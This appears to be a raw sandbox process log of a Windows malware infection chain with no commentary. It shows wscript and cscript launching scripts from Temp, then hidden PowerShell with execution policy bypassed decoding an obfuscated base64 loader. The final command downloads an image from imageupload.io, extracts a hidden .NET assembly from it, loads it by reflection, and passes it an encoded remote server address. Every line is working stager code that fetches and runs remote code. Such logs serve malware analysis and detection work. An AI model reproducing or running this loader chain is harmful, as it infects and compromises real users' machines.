wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\1stANzasWQA435786990Mqa9.js
1156cscript.exe "C:\Windows\System32\cscript.exe" C:\Users\test22\AppData\Local\Temp\ZtZrXNAbFDXYomOuLGEMSiBJOBDoapJNRAmytqVsfxPgsEVXFUaakNCAHFIQYATzzYtnzWAoKyvemypxhhmSPkLCuqUWYhWaIBRvZCENNviwxaZppSGgXcFgmObRIIpEXPkYtyuuQZasSYOQjlbLDd.vbs
2184powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JzUbPÇKuBpzUbPÇKuG0zUbPÇKuYQBnzUbPÇKuGUzUbPÇKuVQByzUbPÇKuGwzUbPÇKuIzUbPÇKuzUbPÇKu9zUbPÇKuCzUbPÇKuzUbPÇKuJwBozUbPÇKuHQzUbPÇKudzUbPÇKuBwzUbPÇKuHMzUbPÇKuOgzUbPÇKuvzUbPÇKuC8zUbPÇKuaQBtzUbPÇKuGEzUbPÇKuZwBlzUbPÇKuHUzUbPÇKuczUbPÇKuBszUbPÇKuG8zUbPÇKuYQBkzUbPÇKuC4zUbPÇKuaQBvzUbPÇKuC8zUbPÇKuaQBizUbPÇKuC8zUbPÇKuVwBKzUbPÇKuHYzUbPÇKuZQBYzUbPÇKuDczUbPÇKuMQBhzUbPÇKuGczUbPÇKubQBPzUbPÇKuFEzUbPÇKuNgBHzUbPÇKuHczUbPÇKuXwzUbPÇKuxzUbPÇKuDYzUbPÇKuOQzUbPÇKu4zUbPÇKuDczUbPÇKuNgzUbPÇKuyzUbPÇKuDYzUbPÇKuNzUbPÇKuzUbPÇKuyzUbPÇKuC4zUbPÇKuagBwzUbPÇKuGczUbPÇKuJwzUbPÇKu7zUbPÇKuCQzUbPÇKudwBlzUbPÇKuGIzUbPÇKuQwBszUbPÇKuGkzUbPÇKuZQBuzUbPÇKuHQzUbPÇKuIzUbPÇKuzUbPÇKu9zUbPÇKuCzUbPÇKuzUbPÇKuTgBlzUbPÇKuHczUbPÇKuLQBPzUbPÇKuGIzUbPÇKuagBlzUbPÇKuGMzUbPÇKudzUbPÇKuzUbPÇKugzUbPÇKuFMzUbPÇKueQBzzUbPÇKuHQzUbPÇKuZQBtzUbPÇKuC4zUbPÇKuTgBlzUbPÇKuHQzUbPÇKuLgBXzUbPÇKuGUzUbPÇKuYgBDzUbPÇKuGwzUbPÇKuaQBlzUbPÇKuG4zUbPÇKudzUbPÇKuzUbPÇKu7zUbPÇKuCQzUbPÇKuaQBtzUbPÇKuGEzUbPÇKuZwBlzUbPÇKuEIzUbPÇKueQB0zUbPÇKuGUzUbPÇKucwzUbPÇKugzUbPÇKuD0zUbPÇKuIzUbPÇKuzUbPÇKukzUbPÇKuHczUbPÇKuZQBizUbPÇKuEMzUbPÇKubzUbPÇKuBpzUbPÇKuGUzUbPÇKubgB0zUbPÇKuC4zUbPÇKuRzUbPÇKuBvzUbPÇKuHczUbPÇKubgBszUbPÇKuG8zUbPÇKuYQBkzUbPÇKuEQzUbPÇKuYQB0zUbPÇKuGEzUbPÇKuKzUbPÇKuzUbPÇKukzUbPÇKuGkzUbPÇKubQBhzUbPÇKuGczUbPÇKuZQBVzUbPÇKuHIzUbPÇKubzUbPÇKuzUbPÇKupzUbPÇKuDszUbPÇKuJzUbPÇKuBpzUbPÇKuG0zUbPÇKuYQBnzUbPÇKuGUzUbPÇKuVzUbPÇKuBlzUbPÇKuHgzUbPÇKudzUbPÇKuzUbPÇKugzUbPÇKuD0zUbPÇKuIzUbPÇKuBbzUbPÇKuFMzUbPÇKueQBzzUbPÇKuHQzUbPÇKuZQBtzUbPÇKuC4zUbPÇKuVzUbPÇKuBlzUbPÇKuHgzUbPÇKudzUbPÇKuzUbPÇKuuzUbPÇKuEUzUbPÇKubgBjzUbPÇKuG8zUbPÇKuZzUbPÇKuBpzUbPÇKuG4zUbPÇKuZwBdzUbPÇKuDozUbPÇKuOgBVzUbPÇKuFQzUbPÇKuRgzUbPÇKu4zUbPÇKuC4zUbPÇKuRwBlzUbPÇKuHQzUbPÇKuUwB0zUbPÇKuHIzUbPÇKuaQBuzUbPÇKuGczUbPÇKuKzUbPÇKuzUbPÇKukzUbPÇKuGkzUbPÇKubQBhzUbPÇKuGczUbPÇKuZQBCzUbPÇKuHkzUbPÇKudzUbPÇKuBlzUbPÇKuHMzUbPÇKuKQzUbPÇKu7zUbPÇKuCQzUbPÇKucwB0zUbPÇKuGEzUbPÇKucgB0zUbPÇKuEYzUbPÇKubzUbPÇKuBhzUbPÇKuGczUbPÇKuIzUbPÇKuzUbPÇKu9zUbPÇKuCzUbPÇKuzUbPÇKuJwzUbPÇKu8zUbPÇKuDwzUbPÇKuQgBBzUbPÇKuFMzUbPÇKuRQzUbPÇKu2zUbPÇKuDQzUbPÇKuXwBTzUbPÇKuFQzUbPÇKuQQBSzUbPÇKuFQzUbPÇKuPgzUbPÇKu+zUbPÇKuCczUbPÇKuOwzUbPÇKukzUbPÇKuGUzUbPÇKubgBkzUbPÇKuEYzUbPÇKubzUbPÇKuBhzUbPÇKuGczUbPÇKuIzUbPÇKuzUbPÇKu9zUbPÇKuCzUbPÇKuzUbPÇKuJwzUbPÇKu8zUbPÇKuDwzUbPÇKuQgBBzUbPÇKuFMzUbPÇKuRQzUbPÇKu2zUbPÇKuDQzUbPÇKuXwBFzUbPÇKuE4zUbPÇKuRzUbPÇKuzUbPÇKu+zUbPÇKuD4zUbPÇKuJwzUbPÇKu7zUbPÇKuCQzUbPÇKucwB0zUbPÇKuGEzUbPÇKucgB0zUbPÇKuEkzUbPÇKubgBkzUbPÇKuGUzUbPÇKuezUbPÇKuzUbPÇKugzUbPÇKuD0zUbPÇKuIzUbPÇKuzUbPÇKukzUbPÇKuGkzUbPÇKubQBhzUbPÇKuGczUbPÇKuZQBUzUbPÇKuGUzUbPÇKuezUbPÇKuB0zUbPÇKuC4zUbPÇKuSQBuzUbPÇKuGQzUbPÇKuZQB4zUbPÇKuE8zUbPÇKuZgzUbPÇKuozUbPÇKuCQzUbPÇKucwB0zUbPÇKuGEzUbPÇKucgB0zUbPÇKuEYzUbPÇKubzUbPÇKuBhzUbPÇKuGczUbPÇKuKQzUbPÇKu7zUbPÇKuCQzUbPÇKuZQBuzUbPÇKuGQzUbPÇKuSQBuzUbPÇKuGQzUbPÇKuZQB4zUbPÇKuCzUbPÇKuzUbPÇKuPQzUbPÇKugzUbPÇKuCQzUbPÇKuaQBtzUbPÇKuGEzUbPÇKuZwBlzUbPÇKuFQzUbPÇKuZQB4zUbPÇKuHQzUbPÇKuLgBJzUbPÇKuG4zUbPÇKuZzUbPÇKuBlzUbPÇKuHgzUbPÇKuTwBmzUbPÇKuCgzUbPÇKuJzUbPÇKuBlzUbPÇKuG4zUbPÇKuZzUbPÇKuBGzUbPÇKuGwzUbPÇKuYQBnzUbPÇKuCkzUbPÇKuOwzUbPÇKukzUbPÇKuHMzUbPÇKudzUbPÇKuBhzUbPÇKuHIzUbPÇKudzUbPÇKuBJzUbPÇKuG4zUbPÇKuZzUbPÇKuBlzUbPÇKuHgzUbPÇKuIzUbPÇKuzUbPÇKutzUbPÇKuGczUbPÇKuZQzUbPÇKugzUbPÇKuDzUbPÇKuzUbPÇKuIzUbPÇKuzUbPÇKutzUbPÇKuGEzUbPÇKubgBkzUbPÇKuCzUbPÇKuzUbPÇKuJzUbPÇKuBlzUbPÇKuG4zUbPÇKuZzUbPÇKuBJzUbPÇKuG4zUbPÇKuZzUbPÇKuBlzUbPÇKuHgzUbPÇKuIzUbPÇKuzUbPÇKutzUbPÇKuGczUbPÇKudzUbPÇKuzUbPÇKugzUbPÇKuCQzUbPÇKucwB0zUbPÇKuGEzUbPÇKucgB0zUbPÇKuEkzUbPÇKubgBkzUbPÇKuGUzUbPÇKuezUbPÇKuzUbPÇKu7zUbPÇKuCQzUbPÇKucwB0zUbPÇKuGEzUbPÇKucgB0zUbPÇKuEkzUbPÇKubgBkzUbPÇKuGUzUbPÇKuezUbPÇKuzUbPÇKugzUbPÇKuCszUbPÇKuPQzUbPÇKugzUbPÇKuCQzUbPÇKucwB0zUbPÇKuGEzUbPÇKucgB0zUbPÇKuEYzUbPÇKubzUbPÇKuBhzUbPÇKuGczUbPÇKuLgBMzUbPÇKuGUzUbPÇKubgBnzUbPÇKuHQzUbPÇKuazUbPÇKuzUbPÇKu7zUbPÇKuCQzUbPÇKuYgBhzUbPÇKuHMzUbPÇKuZQzUbPÇKu2zUbPÇKuDQzUbPÇKuTzUbPÇKuBlzUbPÇKuG4zUbPÇKuZwB0zUbPÇKuGgzUbPÇKuIzUbPÇKuzUbPÇKu9zUbPÇKuCzUbPÇKuzUbPÇKuJzUbPÇKuBlzUbPÇKuG4zUbPÇKuZzUbPÇKuBJzUbPÇKuG4zUbPÇKuZzUbPÇKuBlzUbPÇKuHgzUbPÇKuIzUbPÇKuzUbPÇKutzUbPÇKuCzUbPÇKuzUbPÇKuJzUbPÇKuBzzUbPÇKuHQzUbPÇKuYQByzUbPÇKuHQzUbPÇKuSQBuzUbPÇKuGQzUbPÇKuZQB4zUbPÇKuDszUbPÇKuJzUbPÇKuBizUbPÇKuGEzUbPÇKucwBlzUbPÇKuDYzUbPÇKuNzUbPÇKuBDzUbPÇKuG8zUbPÇKubQBtzUbPÇKuGEzUbPÇKubgBkzUbPÇKuCzUbPÇKuzUbPÇKuPQzUbPÇKugzUbPÇKuCQzUbPÇKuaQBtzUbPÇKuGEzUbPÇKuZwBlzUbPÇKuFQzUbPÇKuZQB4zUbPÇKuHQzUbPÇKuLgBTzUbPÇKuHUzUbPÇKuYgBzzUbPÇKuHQzUbPÇKucgBpzUbPÇKuG4zUbPÇKuZwzUbPÇKuozUbPÇKuCQzUbPÇKucwB0zUbPÇKuGEzUbPÇKucgB0zUbPÇKuEkzUbPÇKubgBkzUbPÇKuGUzUbPÇKuezUbPÇKuzUbPÇKuszUbPÇKuCzUbPÇKuzUbPÇKuJzUbPÇKuBizUbPÇKuGEzUbPÇKucwBlzUbPÇKuDYzUbPÇKuNzUbPÇKuBMzUbPÇKuGUzUbPÇKubgBnzUbPÇKuHQzUbPÇKuazUbPÇKuzUbPÇKupzUbPÇKuDszUbPÇKuJzUbPÇKuBjzUbPÇKuG8zUbPÇKubQBtzUbPÇKuGEzUbPÇKubgBkzUbPÇKuEIzUbPÇKueQB0zUbPÇKuGUzUbPÇKucwzUbPÇKugzUbPÇKuD0zUbPÇKuIzUbPÇKuBbzUbPÇKuFMzUbPÇKueQBzzUbPÇKuHQzUbPÇKuZQBtzUbPÇKuC4zUbPÇKuQwBvzUbPÇKuG4zUbPÇKudgBlzUbPÇKuHIzUbPÇKudzUbPÇKuBdzUbPÇKuDozUbPÇKuOgBGzUbPÇKuHIzUbPÇKubwBtzUbPÇKuEIzUbPÇKuYQBzzUbPÇKuGUzUbPÇKuNgzUbPÇKu0zUbPÇKuFMzUbPÇKudzUbPÇKuByzUbPÇKuGkzUbPÇKubgBnzUbPÇKuCgzUbPÇKuJzUbPÇKuBizUbPÇKuGEzUbPÇKucwBlzUbPÇKuDYzUbPÇKuNzUbPÇKuBDzUbPÇKuG8zUbPÇKubQBtzUbPÇKuGEzUbPÇKubgBkzUbPÇKuCkzUbPÇKuOwzUbPÇKukzUbPÇKuGwzUbPÇKubwBhzUbPÇKuGQzUbPÇKuZQBkzUbPÇKuEEzUbPÇKucwBzzUbPÇKuGUzUbPÇKubQBizUbPÇKuGwzUbPÇKueQzUbPÇKugzUbPÇKuD0zUbPÇKuIzUbPÇKuBbzUbPÇKuFMzUbPÇKueQBzzUbPÇKuHQzUbPÇKuZQBtzUbPÇKuC4zUbPÇKuUgBlzUbPÇKuGYzUbPÇKubzUbPÇKuBlzUbPÇKuGMzUbPÇKudzUbPÇKuBpzUbPÇKuG8zUbPÇKubgzUbPÇKuuzUbPÇKuEEzUbPÇKucwBzzUbPÇKuGUzUbPÇKubQBizUbPÇKuGwzUbPÇKueQBdzUbPÇKuDozUbPÇKuOgBMzUbPÇKuG8zUbPÇKuYQBkzUbPÇKuCgzUbPÇKuJzUbPÇKuBjzUbPÇKuG8zUbPÇKubQBtzUbPÇKuGEzUbPÇKubgBkzUbPÇKuEIzUbPÇKueQB0zUbPÇKuGUzUbPÇKucwzUbPÇKupzUbPÇKuDszUbPÇKuJzUbPÇKuB0zUbPÇKuHkzUbPÇKuczUbPÇKuBlzUbPÇKuCzUbPÇKuzUbPÇKuPQzUbPÇKugzUbPÇKuCQzUbPÇKubzUbPÇKuBvzUbPÇKuGEzUbPÇKuZzUbPÇKuBlzUbPÇKuGQzUbPÇKuQQBzzUbPÇKuHMzUbPÇKuZQBtzUbPÇKuGIzUbPÇKubzUbPÇKuB5zUbPÇKuC4zUbPÇKuRwBlzUbPÇKuHQzUbPÇKuVzUbPÇKuB5zUbPÇKuHzUbPÇKuzUbPÇKuZQzUbPÇKuozUbPÇKuCczUbPÇKuRgBpzUbPÇKuGIzUbPÇKuZQByzUbPÇKuC4zUbPÇKuSzUbPÇKuBvzUbPÇKuG0zUbPÇKuZQzUbPÇKunzUbPÇKuCkzUbPÇKuOwzUbPÇKukzUbPÇKuG0zUbPÇKuZQB0zUbPÇKuGgzUbPÇKubwBkzUbPÇKuCzUbPÇKuzUbPÇKuPQzUbPÇKugzUbPÇKuCQzUbPÇKudzUbPÇKuB5zUbPÇKuHzUbPÇKuzUbPÇKuZQzUbPÇKuuzUbPÇKuEczUbPÇKuZQB0zUbPÇKuE0zUbPÇKuZQB0zUbPÇKuGgzUbPÇKubwBkzUbPÇKuCgzUbPÇKuJwBWzUbPÇKuEEzUbPÇKuSQzUbPÇKunzUbPÇKuCkzUbPÇKuLgBJzUbPÇKuG4zUbPÇKudgBvzUbPÇKuGszUbPÇKuZQzUbPÇKuozUbPÇKuCQzUbPÇKubgB1zUbPÇKuGwzUbPÇKubzUbPÇKuzUbPÇKuszUbPÇKuCzUbPÇKuzUbPÇKuWwBvzUbPÇKuGIzUbPÇKuagBlzUbPÇKuGMzUbPÇKudzUbPÇKuBbzUbPÇKuF0zUbPÇKuXQzUbPÇKugzUbPÇKuCgzUbPÇKuJwBkzUbPÇKuEgzUbPÇKuazUbPÇKuzUbPÇKuwzUbPÇKuEwzUbPÇKubQBWzUbPÇKuHUzUbPÇKuYgzUbPÇKuzzUbPÇKuHzUbPÇKuzUbPÇKueQBZzUbPÇKuFYzUbPÇKuYwzUbPÇKuxzUbPÇKuE4zUbPÇKuRzUbPÇKuBNzUbPÇKuHkzUbPÇKuTQBTzUbPÇKuDkzUbPÇKubzUbPÇKuBizUbPÇKuEczUbPÇKubzUbPÇKuBtzUbPÇKuEwzUbPÇKuegBJzUbPÇKuHgzUbPÇKuTQBpzUbPÇKuDQzUbPÇKuegBNzUbPÇKuFQzUbPÇKuRQB1zUbPÇKuE4zUbPÇKuVzUbPÇKuBjzUbPÇKuHgzUbPÇKuTzUbPÇKuBqzUbPÇKuGMzUbPÇKudwBNzUbPÇKuFMzUbPÇKuOzUbPÇKuB2zUbPÇKuE8zUbPÇKubgBCzUbPÇKuDzUbPÇKuzUbPÇKuZzUbPÇKuBHzUbPÇKuGczUbPÇKuPQzUbPÇKunzUbPÇKuCzUbPÇKuzUbPÇKuLzUbPÇKuzUbPÇKugzUbPÇKuCczUbPÇKuJwzUbPÇKugzUbPÇKuCwzUbPÇKuIzUbPÇKuzUbPÇKunzUbPÇKuDIzUbPÇKuJwzUbPÇKugzUbPÇKuCwzUbPÇKuIzUbPÇKuzUbPÇKunzUbPÇKuEYzUbPÇKuaQByzUbPÇKuGUzUbPÇKuZgBvzUbPÇKuHgzUbPÇKucwzUbPÇKunzUbPÇKuCzUbPÇKuzUbPÇKuLzUbPÇKuzUbPÇKugzUbPÇKuCczUbPÇKuMQzUbPÇKunzUbPÇKuCzUbPÇKuzUbPÇKuLzUbPÇKuzUbPÇKugzUbPÇKuCczUbPÇKuQwzUbPÇKu6zUbPÇKuFwzUbPÇKuVwBpzUbPÇKuG4zUbPÇKuZzUbPÇKuBvzUbPÇKuHczUbPÇKucwBczUbPÇKuFQzUbPÇKuZQBtzUbPÇKuHzUbPÇKuzUbPÇKuXzUbPÇKuzUbPÇKunzUbPÇKuCwzUbPÇKuIzUbPÇKuzUbPÇKunzUbPÇKuEYzUbPÇKuaQByzUbPÇKuGUzUbPÇKuZgBvzUbPÇKuHgzUbPÇKucwzUbPÇKunzUbPÇKuCkzUbPÇKuKQzUbPÇKu=';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('zUbPÇKu','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
2332powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/WJveX71agmOQ6Gw_1698762642.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LmVub3pyYVc1NDMyMS9lbGlmLzIxMi4zMTEuNTcxLjcwMS8vOnB0dGg=' , '' , '2' , 'Firefoxs' , '1' , 'C:\Windows\Temp\', 'Firefoxs'))"
2436